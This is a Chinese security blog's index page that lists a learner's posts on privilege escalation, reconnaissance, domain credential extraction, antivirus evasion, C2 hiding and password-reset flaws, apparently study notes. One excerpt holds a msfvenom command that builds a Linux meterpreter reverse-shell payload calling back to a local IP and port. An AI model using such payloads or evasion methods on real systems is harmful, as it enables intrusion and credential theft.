2023年9月8日
TryHackMe中Burpsuite的CSRF令牌绕过
该文被密码保护。 阅读全文
posted @ 2023-09-08 20:57 树大招疯 阅读(4) 评论(0) 推荐(0) 编辑
Window提权
摘要: ### 0x00 权限提升概述 ##### 提权概述 权限提升(privilege escalation):攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限 的管理员用户,从而获得对整个系统得控制权。 ##### Windows系统内置用户和组 内置用户: - Administr 阅读全文
posted @ 2023-09-08 20:55 树大招疯 阅读(200) 评论(0) 推荐(0) 编辑
Linux主机信息收集
摘要: ### 0x00 Linux主机渗透 ##### MSF生成LUNIX平台可执行文件 ```powershell msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.31.246 lport=8882 -f elf -o local 阅读全文
posted @ 2023-09-08 20:39 树大招疯 阅读(153) 评论(0) 推荐(0) 编辑
域内密码凭证获取
摘要: ### 0x00 活动目录数据库 > - 由ntds.dit文件构成 > - 默认存储在所有域控制器上的%SystemRoot%\NTSD文件夹中 > - 只能通过域控制器进程和协议访问 > ntds.dit:活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。 阅读全文
posted @ 2023-09-08 20:38 树大招疯 阅读(75) 评论(0) 推荐(0) 编辑
2023年9月7日
网络/端口扫描工具精简用法合集
摘要: ## 概要 - [Nmap](https://secself.com/d/44#nmap) - [Spyse](https://secself.com/d/44#spyse) - [Masscan](https://secself.com/d/44#masscan) - [Netdiscover]( 阅读全文
posted @ 2023-09-07 02:02 树大招疯 阅读(61) 评论(0) 推荐(0) 编辑
免杀基础
摘要: ## 0x00 免杀的基本概念 免杀就是反病毒技术,它指的是一种使病毒木马免于被杀软查杀的技术,由于免杀技术的涉猎范围非常广,其中包含反会变、逆向工程、系统漏洞等和可技术,所以难度很高,其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。 ## 0x01 杀毒软件检测方式 ## 阅读全文
posted @ 2023-09-07 01:54 树大招疯 阅读(99) 评论(0) 推荐(0) 编辑
C2隐藏和防御
摘要: https://www.cnblogs.com/ConfusedChenSir/articles/16201785.html 阅读全文
posted @ 2023-09-07 01:52 树大招疯 阅读(40) 评论(0) 推荐(0) 编辑
Github搜索语法
摘要: https://docs.github.com/zh/search-github 阅读全文
posted @ 2023-09-07 01:44 树大招疯 阅读(31) 评论(0) 推荐(0) 编辑
如何学安全
摘要: 没人交流,很蛋疼问题 不交流的原因没有一个共同的话题,定期做项目(红蓝对抗) 不走心,又懒又菜,全靠自律 每天记笔记总结,静下心学习,推荐看《自控力》学习如何自控。 兴趣 娱乐化,定期做项目(红蓝对抗) 频繁的正反馈 没有思路,没有方向,不知道如何下手,不知道和学习方法,没有学习资源,条件有限情况下 阅读全文
posted @ 2023-09-07 01:40 树大招疯 阅读(99) 评论(0) 推荐(0) 编辑
任意账号密码重置的6种方法
摘要: ## 一、短信验证码回传 ### 1、原理 通过手机找回密码,响应包中包含短信验证码 ### 2、案例 某网站选择用手机找回密码: ![图片](https://img2023.cnblogs.com/blog/1622372/202309/1622372-20230907011459817-5532 阅读全文
posted @ 2023-09-07 01:17 树大招疯 阅读(154) 评论(0) 推荐(0) 编辑
下一页